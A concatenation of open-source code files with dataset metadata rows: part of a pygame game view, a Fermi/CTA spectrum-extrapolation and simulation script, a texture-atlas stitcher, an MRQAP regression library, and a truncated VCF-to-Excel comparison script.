if self.model.level == 1:
words = 'Avoid gunfire until you reach the target zone. ' \
'Once in the zone force the craft down by engaging ' \
'enemy fire. Use the arrows or wsad keys. Good luck Agent!'
elif self.model.level == 2:
words = 'Again, only get shot down when inside the ' \
'Green Zone. Use the arrows or wsad keys. Good luck Agent!'
elif self.model.level == 3:
words = 'You know the drill by now, Agent. ' \
'Keep it tidy and see you at debriefing! '
elif self.model.level == 5:
words = 'Look sharp, Agent. Reports indicate more ' \
'resistance, incoming!'
elif self.model.level == 6:
words = 'Something has come up, I am going in hiding ' \
'and so should you! Finish the mission and disappear!'
else:
self.tactical_info_sprite = None
return
if words:
helpful_words = self.print_wrapped_text(
words, 30, self.font, TEXT )
self.tactical_info_sprite = helpful_words.copy()
self.tactical_info_sprite.fill(BORDER)
self.tactical_info_sprite.blit(helpful_words, (0,0))
elif self.model.state == STATE_RESULTS:
self.results_sprite = self.print_wrapped_text(
self.model.results, 35, self.smallfont, BLACK)
def scroll_brief(self, offset):
if self.model.state == STATE_BUILD:
self.brief_offset += offset
max_size = self.brief_sprite.rect.height * 6
if self.brief_offset > max_size:
self.brief_offset = max_size
if self.brief_offset < 0:
self.brief_offset = 0
def model_event(self, event_name, data):
print('view event "%s" => %s' % (event_name, data))
if event_name == 'levelup':
self.player_craft = None
elif event_name == 'state':
self.load_background()
if self.model.is_new_level:
self.brief_offset = 0
self.draw_briefing_words()
self.exit_counter = None
self.load_build_sprites()
if self.model.state in (STATE_UFO, STATE_FLIGHT) and not self.player_craft:
self.draw_briefing_words()
self.load_player_craft_sprites()
if self.model.state == STATE_RESULTS:
self.draw_briefing_words()
elif event_name == 'deploy fighter jet':
self.add_fighter_jet()
@property
def translated_mousepos(self):
"""
Get the mouse position translated according to the screen scale ratio.
"""
xy = pygame.mouse.get_pos()
scaled_xoffset = (self.scale_center[0] / self.scale_ratio)
scaled_yoffset = (self.scale_center[1] / self.scale_ratio)
xy = (
xy[0] / self.scale_ratio - scaled_xoffset,
xy[1] / self.scale_ratio - scaled_yoffset)
return xy
def mouseDown(self):
if self.model.state == STATE_MENU:
return
self.dragging_sprite = None
xy = self.translated_mousepos
# affirmative and negatory buttons
if self.confirm_action:
affirm = pygame.Rect(204, 287, 191, 25)
if affirm.collidepoint(xy):
if self.confirm_action == 'plant':
if self.model.level == len(TACTICAL_TYPE):
print('Warning: There are no tactical missions for level %s' % self.model.level)
else:
self.model.set_state(TACTICAL_TYPE[self.model.level])
self.confirm_action = None
negate = pygame.Rect(204, 337, 191, 25)
if negate.collidepoint(xy):
self.confirm_action = None
return
if self.model.state == STATE_BUILD:
# sprite click
for sprite in self.sprites:
if sprite.rect.collidepoint(xy):
self.dragging_sprite = sprite
# place dragging sprite on top
self.sprites.remove(self.dragging_sprite)
self.sprites.append(self.dragging_sprite)
self.drag_offset = (
xy[0] - sprite.rect.center[0],
xy[1] - sprite.rect.center[1],
)
return
# plant button click
button = pygame.Rect(390, 165, 198, 29)
if button.collidepoint(xy):
self.confirm_action = 'plant'
def mouseUp(self):
if self.dragging_sprite:
part = self.dragging_sprite.name
x,y = self.dragging_sprite.rect.center
self.dragging_sprite = None
if y < 400:
self.model.builder.remove_part(part)
else:
self.model.builder.add_part(part)
def mouseWheelUp(self):
self.scroll_brief(-16)
def mouseWheelDown(self):
self.scroll_brief(16)
def keyDown(self, key):
if key == K_DOWN:
self.scroll_brief(16)
if key == K_UP:
self.scroll_brief(-16)
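# --- Editor's sketch (hedged; not part of the original game code) ---
# translated_mousepos above maps raw screen coordinates back into canvas space.
# The standalone helper below mirrors that arithmetic so it can be checked in
# isolation; the sample ratio and offset values are invented for illustration.
def _translate_mouse(xy, scale_ratio, scale_center):
    # invert the scale-and-centre transform applied when the canvas is blitted
    scaled_xoffset = scale_center[0] / scale_ratio
    scaled_yoffset = scale_center[1] / scale_ratio
    return (xy[0] / scale_ratio - scaled_xoffset,
            xy[1] / scale_ratio - scaled_yoffset)

# e.g. a 2x upscaled canvas centred with a (100, 50) pixel offset:
# _translate_mouse((500, 300), 2.0, (100, 50)) == (200.0, 125.0)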
| gpl-3.0 | -8,907,586,306,427,302,000 | 33.199783 | 111 | 0.518509 | false | 3.798143 | false | false | false |
davidsanchez/CTAtools | Script/SimulSelectedFrom3FHL.py | 1 | 5367 | # Created to read the Salvatore table, read the 3FHL data, extrapolate it (using the Biteau prescription) and simulate with ctools
# Made for Rio 2017.
# author David Sanchez [email protected]
# Gate Florian
# Piel Quentin
# ------ Imports --------------- #
import numpy,math,pyfits,os,sys
from Plot.PlotLibrary import *
from Catalog.ReadFermiCatalog import *
from environ import FERMI_CATALOG_DIR,INST_DIR
from Plot.PlotLibrary import *
from ebltable.tau_from_model import OptDepth as OD
from os.path import join
import Script.Common_Functions as CF
import ctoolsAnalysis.xml_generator as xml
from ctoolsAnalysis.config import get_config,get_default_config
from ctoolsAnalysis.SimulateSource import CTA_ctools_sim
from submit import call
# ------------------------------ #
def GetInfoFromTable(fitstable,indice):
'''Read the Salvatore table and return the info for the source at position indice.
Parameters
---------
fitstable : pyfits object : table to be browsed
indice : place of the source in the table
'''
data = fitstable[1].data[indice]
sourcename = data[0]
ra = data[1]
dec = data[2]
z = data[4]
if math.isnan(z):
z=0
hemisphere = data[6]
observation_type = data[8]
if hemisphere =='S':
hemisphere ='South'
if hemisphere =='N':
hemisphere ='North'
return sourcename,ra,dec,z,hemisphere,observation_type
def cutoff(energy,z):
'''Apply the JB cut-off prescription.
Parameters
---------
energy : in TeV.
'''
return numpy.exp(-energy/(3./(1+z)))
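# Editor's note (hedged illustration): the cut-off energy above is 3/(1+z) TeV, so
# a 1 TeV photon from a z=0.2 source is suppressed by exp(-1.2/3) ~= 0.67. The
# check below only documents that expectation with made-up example values.
assert abs(cutoff(1.0, 0.2) - numpy.exp(-0.4)) < 1e-12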
def ComputeExtrapolateSpectrum(sourcename,z,eblmodel = "dominguez",alpha = -1,out="."):
try :
Cat = FermiCatalogReader.fromName(sourcename,FK5,FERMI_CATALOG_DIR,"dnde","MeV") #read 3FHL
except :
print 'cannot read 3FHL for some reason, returning'
return
emin = 5e4 #Mev
emax = 100e6
params = Cat.ReadPL("3FHL")
print params
spec = Spectrum(params,Model="PowerLaw",Emin=emin,
Emax=emax,Representation="dnde",escale="MeV",
Npt=1000)
energy,phi = spec.GetModel()
# Cat.MakeSpectrum("3FHL",emin,emax)
# _,_,energy,phi = Cat.Plot("3FHL")
SpectreWithCutoff = cutoff(energy/1e6,z)
#Correct for EBL using Dominguez model
tau = OD.readmodel(model = eblmodel)
TauEBL = tau.opt_depth(z,energy/1e6)
Etau2 = numpy.interp([2.],TauEBL,energy/1e6)*1e6 # Input in TeV -> Get MeV at the end
EBL_corrected_phi = phi*numpy.exp(alpha * TauEBL)
phi_extrapolated = EBL_corrected_phi*SpectreWithCutoff
# phi_extrapolated = EBL_corrected_phi
outfile = out+"/"+sourcename.replace(" ","")+"_File.txt"
CF.MakeFileFunction(energy,phi_extrapolated+1e-300,outfile)
return outfile, Etau2
if __name__=="__main__":
TableInfo = pyfits.open(INST_DIR+'/data/table_20161213.fits')
outfolder = join(os.getcwd(), "out/Dominguez3TeVCutOff")
# outfolder = join(os.getcwd(), "out/DominguezNoCutOff")
#default work and out path.
work = join(os.getcwd(), "work")
os.system("mkdir -p "+outfolder)
i = int(sys.argv[1])
sourcename,ra,dec,z,hemisphere,_ = GetInfoFromTable(TableInfo,i)
print 'work on source ',sourcename,' at a redshift of z=',z
Filefunction, Etau2 = ComputeExtrapolateSpectrum(sourcename,z,eblmodel = "dominguez",alpha = -1,out=outfolder)
########### Create XML
lib,doc = xml.CreateLib()
spec = xml.addFileFunction(lib, sourcename, type = "PointSource",filefun=Filefunction,flux_free=1, flux_value=1., flux_scale=1.,flux_max=100000000.0, flux_min=0.0)
spatial = xml.AddPointLike(doc,ra,dec)
spec.appendChild(spatial)
lib.appendChild(spec)
bkg = xml.addCTAIrfBackground(lib)
lib.appendChild(bkg)
open(Filefunction.replace("_File.txt",'.xml'), 'w').write(doc.toprettyxml(' '))
#######################
simutime = 100 #Hours
irfTime = CF.IrfChoice(simutime)
# setup : Time, Energy and IRFS.
tmin = 0
tmax = int(simutime*3600)
emin_table =[0.05,Etau2*1e-6] #TeV
emax = 100 #TeV
irf = "South_z20_"+str(irfTime.replace(".0",""))+"h"
caldb = "prod3b"
config = CF.MakeconfigFromDefault(outfolder,work,sourcename,ra,dec)
# config.write(open("simu_"+sourcename.replace(" ","")+"_"+str(simutime)+"h"+".conf", 'w'))
for emin in emin_table:
print 'simu'
#creation of the simulation object
# simu = CTA_ctools_sim.fromConfig(config)
# simu.SetTimeRange(tmin,tmax)
# simu.SetIRFs(caldb,irf)
# simu.SetEnergyRange(float(emin),emax)
config["file"]["inmodel"] = Filefunction.replace("_File.txt",'.xml')
config["time"]["tmin"] = tmin
config["time"]["tmax"] = tmax
config["irfs"]["irf"] = irf
config["irfs"]["caldb"] = caldb
config["energy"]["emin"] = float(emin)
config["energy"]["emax"] = emax
config_file = Filefunction.replace("_File.txt","_"+str(int(emin*100.)/100.)+"TeV"+".conf")
config.write(open(config_file, 'w'))
print "save configuration file ",config_file
# run the simulation
cmd = "python "+join(os.getcwd(), "Simulate_Ctools.py")+" "+config_file
call(cmd,config_file.replace(".conf",".sh"),config_file.replace(".conf",".log"))
# os.system(cmd)
| gpl-3.0 | 5,488,889,861,555,646,000 | 32.335404 | 167 | 0.6376 | false | 3.072124 | true | false | false |
nagakawa/x801 | tools/autostitch.py | 1 | 2633 | # Texture Stitcher for x801
# Usage: python3 tools/autostitch.py assets/textures/terrain/blocks asset-src/textures/terrain/gimpfiles/blocknames.tti assets/textures/terrain/blocks.tti asset-temp/textures/terrain/gimpfiles
import argparse
import fparser
import pathlib
import re
import readtable
from PIL import Image
parser = argparse.ArgumentParser(description='Stitch textures for Experiment801.')
parser.add_argument('destinationImage', metavar='di', type=str, nargs=1,
help='the destination path for the image')
parser.add_argument('sourceTable', metavar='sd', type=str, nargs=1,
help='the source path for the table')
parser.add_argument('destinationTable', metavar='dd', type=str, nargs=1,
help='the destination path for the table')
parser.add_argument('images', metavar='images', type=str, nargs=1,
help='the path with the appropriate images')
args = parser.parse_args()
tsize = 32
# Reasonable requirement for max texture size
# according to http://feedback.wildfiregames.com/report/opengl/feature/GL_MAX_TEXTURE_SIZE
asize = 4096
tdim = asize // tsize
cumul = 0
pageno = 0
capat = tdim * tdim
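# Editor's note (hedged): with the constants above, 32 px tiles on a 4096 px atlas
# give tdim = 128 columns and capat = 16384 slots per page; once cumul reaches
# capat the current page is saved and a fresh page is started.
assert tdim == 128 and capat == 128 * 128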
image = Image.new(
"RGBA",
(asize, asize),
(0, 0, 0, 0)
)
st = args.sourceTable[0]
# name -> id
nametrans = lambda x: x
if st != "*":
nametable = readtable.read(st)
nametrans = lambda x: nametable.get(x, None)
table = {}
def save():
image.save(args.destinationImage[0] + "." + str(pageno) + ".png")
for fn in pathlib.Path(args.images[0]).glob("*.png"):
# Add file entry
shortname = fn.name
shortname = shortname[0:shortname.rfind('.')]
myid = nametrans(shortname)
if myid is None:
fparser.error("Name not found: " + shortname)
table[myid] = cumul + capat * pageno
# Try to open image
newImage = Image.open(str(fn))
if newImage.height > tsize:
fparser.error("Image is too tall: %d > %d", newImage.height, tsize)
# Write image
nSlots = (newImage.height + tsize - 1) // tsize;
progress = 0
while progress < nSlots:
if cumul >= capat:
# No more room.
# Save the current image and start a new page
save()
image = Image.new(
"RGBA",
(asize, asize),
(0, 0, 0, 0)
)
pageno += 1
cumul -= capat
x = cumul % tdim
y = cumul // tdim
pasteAmt = min(nSlots, tdim - x)
# crop the next pasteAmt slots from the source image and paste them into the free slot
region = newImage.crop(
(progress * tsize, 0, (progress + pasteAmt) * tsize, tsize)
)
image.paste(region, (x * tsize, y * tsize))
cumul += pasteAmt
progress += pasteAmt
save()
fh = open(args.destinationTable[0], "w")
for (name, index) in table.items():
fh.write(str(name) + " " + str(index) + "\n")
fh.close() | agpl-3.0 | 3,161,928,597,332,988,400 | 27.945055 | 193 | 0.664261 | false | 3.058072 | false | false | false |
lisette-espin/mrqap | libs/mrqap.py | 1 | 11208 | __author__ = 'espin'
#######################################################################
# Dependencies
#######################################################################
import sys
import collections
import numpy as np
import pandas
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from statsmodels.formula.api import ols
from libs import utils
from libs.profiling import Profiling
import time
import gc
from scipy import stats
from scipy.stats.mstats import zscore
#######################################################################
# MRQAP
#######################################################################
INTERCEPT = 'Intercept'
class MRQAP():
#####################################################################################
# Constructor and Init
#####################################################################################
def __init__(self, Y=None, X=None, npermutations=-1, diagonal=False, directed=False, logfile=None, memory=None, standarized=False):
'''
Initialization of variables
:param Y: numpy array depended variable
:param X: dictionary of numpy array independed variables
:param npermutations: int number of permutations
:param diagonal: boolean, False to delete diagonal from the OLS model
:return:
'''
self.X = X # independent variables: dictionary of numpy.array
self.Y = Y # dependent variable: dictionary numpy.array
self.n = Y.values()[0].shape[0] # number of nodes
self.npermutations = npermutations # number of permutations
self.diagonal = diagonal # False then diagonal is removed
self.directed = directed # directed True, undirected False
self.data = None # Pandas DataFrame
self.model = None # OLS Model y ~ x1 + x2 + x3 (original)
self.v = collections.OrderedDict() # vectorized matrices, flatten variables with no diagonal
self.betas = collections.OrderedDict() # betas distribution
self.tvalues = collections.OrderedDict() # t-test values
self.logfile = logfile # logfile path name
self.standarized = standarized
self.memory = memory if memory is not None else Profiling() # to track memory usage
def init(self):
'''
Generating the original OLS model. Y and Xs are flattened.
Also, the betas and tvalues dictionaries are initialized (key:independent variables, value:[])
:return:
'''
self.v[self.Y.keys()[0]] = self._getFlatten(self.Y.values()[0])
self._initCoefficients(INTERCEPT)
for k,x in self.X.items():
if k == self.Y.keys()[0]:
utils.printf('ERROR: Independent variable cannot be named \'{}\''.format(self.Y.keys()[0]), self.logfile)
sys.exit(0)
self.v[k] = self._getFlatten(x)
self._initCoefficients(k)
self.data = pandas.DataFrame(self.v)
self.model = self._fit(self.v.keys(), self.data)
del(self.X)
def profiling(self, key):
self.memory.check_memory(key)
#####################################################################################
# Core QAP methods
#####################################################################################
def mrqap(self):
'''
Multiple Regression Quadratic Assignment Procedure
:return:
'''
directed = 'd' if self.directed else 'i'
key = self.npermutations if self.memory.perm else self.n
self.profiling('init-{}-{}'.format(directed, key))
self.init()
self.profiling('shuffle-{}-{}'.format(directed, key))
self._shuffle()
self.profiling('end-{}-{}'.format(directed, key))
def _shuffle(self):
'''
Shuffling rows and columns npermutations times.
beta coefficients and tvalues are stored.
:return:
'''
for p in range(self.npermutations):
self.Ymod = self.Y.values()[0].copy()
self._rmperm()
model = self._newfit()
self._update_betas(model._results.params)
self._update_tvalues(model.tvalues)
self.Ymod = None
gc.collect()
def _newfit(self):
'''
Generates a new OLS fit model
:return:
'''
newv = collections.OrderedDict()
newv[self.Y.keys()[0]] = self._getFlatten(self.Ymod)
for k,x in self.v.items():
if k != self.Y.keys()[0]:
newv[k] = x
newdata = pandas.DataFrame(newv)
newfit = self._fit(newv.keys(), newdata)
del(newdata)
del(newv)
return newfit
#####################################################################################
# Handlers
#####################################################################################
def _fit(self, keys, data):
'''
Fitting OLS model
keys: the variable names to fit; data: a pandas DataFrame with all variables.
:return:
'''
if self.standarized:
data = data.apply(lambda x: (x - np.mean(x)) / (np.std(x)), axis=0) #axis: 0 to each column, 1 to each row
formula = '{} ~ {}'.format(self.Y.keys()[0], ' + '.join([k for k in keys if k != self.Y.keys()[0]]))
return ols(formula, data).fit()
def _initCoefficients(self, key):
self.betas[key] = []
self.tvalues[key] = []
def _rmperm(self, duplicates=True):
shuffle = np.random.permutation(self.Ymod.shape[0])
np.take(self.Ymod,shuffle,axis=0,out=self.Ymod)
np.take(self.Ymod,shuffle,axis=1,out=self.Ymod)
del(shuffle)
def _update_betas(self, betas):
for idx,k in enumerate(self.betas.keys()):
self.betas[k].append(round(betas[idx],6))
def _update_tvalues(self, tvalues):
for k in self.tvalues.keys():
self.tvalues[k].append(round(tvalues[k],6))
def _getFlatten(self, original):
return self._deleteDiagonalFlatten(original)
def _deleteDiagonalFlatten(self, original):
tmp = original.flatten()
if not self.diagonal:
tmp = np.delete(tmp, [i*(original.shape[0]+1)for i in range(original.shape[0])])
return tmp
def _zeroDiagonalFlatten(self, original):
tmp = original.copy()
if not self.diagonal:
np.fill_diagonal(tmp,0)
f = tmp.flatten()
del(tmp)
return f
#####################################################################################
# Prints
#####################################################################################
def summary(self):
'''
Prints the OLS original summary and beta and tvalue summary.
:return:
'''
self._summary_ols()
self._summary_betas()
self._summary_tvalues()
self._ttest()
def _summary_ols(self):
'''
Print the OLS summary
:return:
'''
utils.printf('', self.logfile)
utils.printf('=== Summary OLS (original) ===\n{}'.format(self.model.summary()), self.logfile)
utils.printf('', self.logfile)
utils.printf('# of Permutations: {}'.format(self.npermutations), self.logfile)
def _summary_betas(self):
'''
Summary of beta coefficients
:return:
'''
utils.printf('', self.logfile)
utils.printf('=== Summary beta coefficients ===', self.logfile)
utils.printf('{:20s}{:>10s}{:>10s}{:>10s}{:>10s}{:>12s}{:>12s}{:>12s}{:>12s}{:>12s}'.format('INDEPENDENT VAR.','MIN','MEDIAN','MEAN','MAX','STD. DEV.','B.COEFF.','As Large', 'As Small', 'P-VALUE'), self.logfile)
for k,v in self.betas.items():
beta = self.model.params[k]
pstats = self.model.pvalues[k]
aslarge = sum([1 for c in v if c >= beta]) / float(len(v))
assmall = sum([1 for c in v if c <= beta]) / float(len(v))
utils.printf('{:20s}{:10f}{:10f}{:10f}{:10f}{:12f}{:12f}{:12f}{:12f}{:12f}'.format(k,min(v),sorted(v)[len(v)/2],sum(v)/len(v),max(v),round(np.std(v),6),beta,aslarge,assmall,round(float(pstats),2)), self.logfile)
def _summary_tvalues(self):
'''
Summary t-values
:return:
'''
utils.printf('', self.logfile)
utils.printf('=== Summary T-Values ===', self.logfile)
utils.printf('{:20s}{:>10s}{:>10s}{:>10s}{:>10s}{:>12s}{:>12s}{:>12s}{:>12s}'.format('INDEPENDENT VAR.','MIN','MEDIAN','MEAN','MAX','STD. DEV.','T-TEST','As Large', 'As Small'), self.logfile)
for k,v in self.tvalues.items():
tstats = self.model.tvalues[k]
aslarge = sum([1 for c in v if c >= tstats]) / float(len(v))
assmall = sum([1 for c in v if c <= tstats]) / float(len(v))
utils.printf('{:20s}{:10f}{:10f}{:10f}{:10f}{:12f}{:12f}{:12f}{:12f}'.format(k,min(v),sorted(v)[len(v)/2],sum(v)/len(v),max(v),round(np.std(v),6),round(float(tstats),2),aslarge,assmall), self.logfile)
def _ttest(self):
utils.printf('')
utils.printf('========== T-TEST ==========')
utils.printf('{:25s} {:25s} {:25s} {:25s}'.format('IND. VAR.','COEF.','T-STAT','P-VALUE'))
ts = {}
lines = {}
for k,vlist in self.betas.items():
t = stats.ttest_1samp(vlist,self.model.params[k])
ts[k] = abs(round(float(t[0]),6))
lines[k] = '{:20s} {:25f} {:25f} {:25f}'.format(k,self.model.params[k],round(float(t[0]),6),round(float(t[1]),6))
ts = utils.sortDictByValue(ts,True)
for t in ts:
utils.printf(lines[t[0]])
#####################################################################################
# Plots
#####################################################################################
def plot(self,coef='betas',fn=None):
'''
Plots frequency of pearson's correlation values
:param coef: string \in {betas, tvalues}
:return:
'''
ncols = 3
m = len(self.betas.keys())
ranges = range(ncols, m, ncols)
i = np.searchsorted(ranges, m, 'left')
nrows = len(ranges)
if i == nrows:
ranges.append((i+1)*ncols)
nrows += 1
fig = plt.figure(figsize=(8,3*i))
for idx,k in enumerate(self.betas.keys()):
plt.subplot(nrows,ncols,idx+1)
if coef == 'betas':
plt.hist(self.betas[k])
elif coef == 'tvalues':
plt.hist(self.tvalues[k])
plt.xlabel('regression coefficients', fontsize=8)
plt.ylabel('frequency', fontsize=8)
plt.title(k)
plt.grid(True)
for ax in fig.get_axes():
ax.tick_params(axis='x', labelsize=5)
ax.tick_params(axis='y', labelsize=5)
plt.tight_layout()
plt.savefig(fn)
plt.close()
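# --- Editor's usage sketch (hedged; not part of the original module) ---
# MRQAP expects the dependent and the independent variables as dicts of square
# numpy matrices. The toy matrices and the small permutation count below are
# invented for illustration and assume the sibling libs.utils/libs.profiling
# modules are importable.
if __name__ == '__main__':
    n = 20
    Y = {'friendship': np.random.randint(0, 2, (n, n))}
    X = collections.OrderedDict([
        ('proximity', np.random.rand(n, n)),
        ('same_team', np.random.randint(0, 2, (n, n))),
    ])
    model = MRQAP(Y=Y, X=X, npermutations=50, diagonal=False, directed=True)
    model.mrqap()    # fit the OLS model and run the row/column permutations
    model.summary()  # print beta and t-value distributions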
| cc0-1.0 | -841,634,498,972,020,200 | 36.864865 | 223 | 0.49536 | false | 3.876859 | true | false | false |
MattWellie/FastqSimulator | excel_out_comparison.py | 1 | 15258 | import cPickle
import os
import re
from openpyxl import load_workbook
import xlsxwriter
__author__ = 'mwelland'
class VCFComparison:
def __init__(self, run_number, variant_dict, vcf_dir):
self.vcf_file = os.path.join(vcf_dir, '{}_anno.vcf.hg19_multianno.vcf'.format(run_number))
self.run_number = run_number
with open(variant_dict, 'r') as handle:
self.variant_dict = cPickle.load(handle)
self.genes = self.variant_dict.keys()
self.vcf = {}
self.results = {}
self.tempvcf = os.path.join(vcf_dir, 'tempout.vcf')
self.matches = 0
self.variants = 0
self.unmatched_predictions = 0
self.excel_dir = 'Excels'
self.mystery_genes = set()
self.transcripts = 0
self.perfect_genes = {'total': 0,
'list': set()}
self.total_observed = 0
def run(self):
self.squish_vcf()
self.open_vcf()
for gene in self.genes:
self.results[gene] = {'found': set(),
'not_found': {'in_vcf': set(),
'in_fq': set()}}
self.check_gene(gene)
os.remove(self.tempvcf)
self.add_missing_variants()
# Print all the output stuff to an excel document
for gene in self.results:
perfect = 0
for section in self.results[gene]['not_found']:
perfect += len(self.results[gene]['not_found'][section])
if perfect == 0:
self.perfect_genes['total'] += 1
self.perfect_genes['list'].add(gene)
self.write_excel()
if self.matches != self.variants:
print 'Total variants counted: {}'.format(self.variants)
print 'Total matches: {}'.format(self.matches)
print 'Predicted and not found:{}'.format(self.unmatched_predictions)
print 'Perfect genes: {}'.format(self.perfect_genes)
else:
print 'All variants found'
def write_excel(self):
# This method will take the results from the process and output to an excel
# There will be a summary page to condense the main details of the comparison
# Each gene will have a further page to describe results in detail
excel_out_name = os.path.join(self.excel_dir, 'run_{}_results.xlsx'.format(self.run_number))
workbook = xlsxwriter.Workbook(excel_out_name)
format_bold = workbook.add_format({'bold': True})
format_matched = workbook.add_format({'bg_color': '#ADFF2F'})
format_missing_db = workbook.add_format({'bg_color': '#F4A460'})
format_missing_excel = workbook.add_format({'bg_color': '#F08080'})
format_hyperlink = workbook.add_format({'font_color': '#0000FF'})
worksheet = workbook.add_worksheet('Summary')
worksheet.set_column(0, 0, 20)
worksheet.set_column(2, 2, 17)
row = 0
col = 0
worksheet.write(row, col, 'Summary Page', format_bold); row += 2
worksheet.write(row, 0, 'Genes featured:', format_bold)
worksheet.write(row, 1, '{}'.format(len(self.genes)), format_bold)
row += 1
worksheet.write(row, 0, 'Transcripts featured:', format_bold)
worksheet.write(row, 1, '{}'.format(self.transcripts), format_bold)
row += 1
worksheet.write(row, 0, 'Variants Expected:', format_bold)
worksheet.write(row, 1, '{}'.format(self.variants), format_bold)
row += 1
worksheet.write(row, 0, 'Variants in VCF:', format_bold)
worksheet.write(row, 1, '{}'.format(self.total_observed), format_bold)
row += 1
worksheet.write(row, 0, 'Variants Matched:', format_bold)
worksheet.write(row, 1, '{}'.format(self.matches), format_bold)
row += 1
worksheet.write(row, 0, 'Dodgy Gene names :', format_bold)
worksheet.write(row, 1, '{}'.format(', '.join(self.mystery_genes)), format_bold)
row += 1
worksheet.write(row, 0, 'Perfect genes ({}):'.format(self.perfect_genes['total']), format_bold)
if self.perfect_genes['total'] != 0:
col = 1
for gene in self.perfect_genes['list']:
worksheet.write(row, col, gene, format_bold)
if col == 1:
col += 1
else:
row += 1
col = 1
row += 2
worksheet.write(row, 0, 'Mismatches by Gene:', format_missing_excel)
row += 1
worksheet.write(row, 0, 'Gene', format_bold)
worksheet.write(row, 1, 'FastQ Predictions', format_bold)
worksheet.write(row, 2, 'VCF Results', format_bold)
highest_row = row + 1
for gene in self.results:
worksheet.write(highest_row, 0, """=HYPERLINK("#{0}!A1", "{0}")""".format(gene), format_hyperlink)
fq_row = highest_row
vcf_row = highest_row
if self.results[gene]['not_found']['in_fq']:
for result in self.results[gene]['not_found']['in_fq']:
worksheet.write(fq_row, 1, result); fq_row += 1
fq_row += 1
if self.results[gene]['not_found']['in_vcf']:
for result in self.results[gene]['not_found']['in_vcf']:
worksheet.write(vcf_row, 2, result); vcf_row += 1
vcf_row += 1
if vcf_row > fq_row:
highest_row = vcf_row
else:
highest_row = fq_row
worksheet.set_column(1, 1, 45)
worksheet.set_column(2, 2, 100)
for gene in self.results:
matches = len(self.results[gene]['found'])
mismatches = 0
for section in self.results[gene]['not_found']:
mismatches += len(self.results[gene]['not_found'][section])
total = mismatches + matches
worksheet = workbook.add_worksheet(gene)
worksheet.write(0, 1, """=HYPERLINK("#Summary!A1", "Link To Summary")""", format_hyperlink)
row = 0
col = 0
worksheet.write(row, col, gene, format_bold); row += 2
worksheet.write(row, col, 'Total Variants:', format_bold); col += 1
worksheet.write(row, col, '{}'.format(total), format_bold); row += 1; col -= 1
worksheet.write(row, col, 'Matched:', format_bold); col += 1
worksheet.write(row, col, '{}'.format(matches), format_bold); row += 1; col -= 1
worksheet.write(row, col, 'Not Matched:', format_bold); col += 1
worksheet.write(row, col, '{}'.format(mismatches), format_bold); row += 1
row += 2
worksheet.write(row, col, 'Variants Matched:', format_matched)
row += 1
for variant in self.results[gene]['found']:
worksheet.write(row, col, variant, format_matched)
row += 1
row += 2
if self.results[gene]['not_found']['in_vcf'] or self.results[gene]['not_found']['in_fq']:
worksheet.write(row, col, 'Unmatched Variants:', format_missing_excel)
row += 1
if self.results[gene]['not_found']['in_fq']:
worksheet.write(row, col, 'Predicted:', format_missing_excel); row += 1
for variant in self.results[gene]['not_found']['in_fq']:
worksheet.write(row, col, variant, format_missing_excel); row += 1
row += 2
else:
worksheet.write(row, col, 'No Predicted Variants:', format_missing_db); row += 2
if self.results[gene]['not_found']['in_vcf']:
worksheet.write(row, col, 'Unexpected:', format_missing_excel); row += 1
for variant in self.results[gene]['not_found']['in_vcf']:
worksheet.write(row, col, variant, format_missing_excel); row += 1
row += 2
else:
worksheet.write(row, col, 'No Unexpected Variants:', format_missing_db); row += 2
else:
worksheet.write(row, col, 'No Unmatched Variants:', format_missing_db)
worksheet.set_column(0, 0, 15)
worksheet.set_column(1, 1, 50)
workbook.close()
def add_missing_variants(self):
for gene in self.vcf:
for row in self.vcf[gene]:
# Search for specific string in complete row
# RegEx required as columns are not always in order
# GeneDetail.refGene=NM_002506:c.-6897A>G
active_match = 'Unknown Variant'
matched = False
if 'GeneDetail.refGene=.;' in row:
if 'AAChange.refGene=.;' not in row:
a = re.search('AAChange.refGene=.*?:(?P<HGVS>NM_.*?);', row)
b = re.search('AAChange.refGene=(?P<HGVS>NM.*?);', row)
if a:
active_match = a
matched = True
elif b:
active_match = b
matched = True
else:
a = re.search('GeneDetail.refGene=.*?:(?P<HGVS>NM_.*?);', row)
b = re.search('GeneDetail.refGene=(?P<HGVS>NM_.*?);', row)
if a:
active_match = a
matched = True
elif b:
active_match = b
matched = True
if matched:
filtered_list = self.filter_matches(active_match.group('HGVS'), gene)
self.results[gene]['not_found']['in_vcf'].add(', '.join(filtered_list))
else:
if gene in self.results:
self.results[gene]['not_found']['in_vcf'].add('Variant unknown')
else:
self.mystery_genes.add(gene)
def filter_matches(self, string, gene):
output_list = []
for element in string.split(';'):
nm_number = element.split(':')[0]  # transcript accession before the first colon
if nm_number in self.variant_dict[gene].keys():
output_list.append(element)
if not output_list:
output_list.append(string.split(';')[0])
return output_list
def squish_vcf(self):
"""
This mini method just writes out only the non-header information from the original vcf into a new file
The file is written to a new output to make sure that it can be read again if required
The output is written in CSV format so that the csv.DictWriter method can be used
"""
with open(self.vcf_file, 'rU') as input_vcf:
with open(self.tempvcf, 'wb') as output_vcf:
for line in input_vcf:
if line[0] == '#':
pass
else:
output_vcf.write(line)
def open_vcf(self):
"""
Add all contents from the VCF into a dictionary object which can be sorted through by gene
Use regex to capture the gene name, create a dictionary index which is the gene name (if not already an index)
Add the row to a list in the dictionary
Might be best to treat the whole 'INFO' block as a single string, as different variants are annotated in
different columns, depending on whether they are 5'UTR, 3'UTR or exonic...
Ready to begin matching against pickled contents
"""
with open(self.tempvcf) as csvfile:
for row in csvfile:
self.total_observed += 1
search_string = row.split('\t')[7]
match = re.search(';Gene\.refGene=(?P<gene_name>,?.*?);', search_string)
if match:
gene = match.group('gene_name')
if gene in self.vcf:
self.vcf[gene].append(search_string)
else:
self.vcf[gene] = [search_string]
else:
print "couldn't match the variant in %s" % row
def check_gene(self, gene):
rows_to_delete = []
gene_vcf = self.vcf[gene]
rows = range(len(gene_vcf))
for transcript in self.variant_dict[gene]:
self.transcripts += 1
variants = self.variant_dict[gene][transcript]
exons = variants.keys()
for exon in exons:
self.variants += 1
hgvs = variants[exon]['hgvs']
found = False
# If the variant is 3' UTR or 5' UTR, e.g. c.-69A>C:
if hgvs[2] == '-' or hgvs[2] == '*':
# Use the exact sequence predicted to write the gene
variant = '{0}:{1}:{2}'.format(gene, transcript, hgvs)
for row in rows:
match = re.search('({0}:)?{1}:{2}'.format(gene, transcript, hgvs), gene_vcf[row])
if match:
rows_to_delete.append(row)
found = True
self.matches += 1
self.results[gene]['found'].add(variant)
break
else:
# Use the exact sequence predicted to write the gene
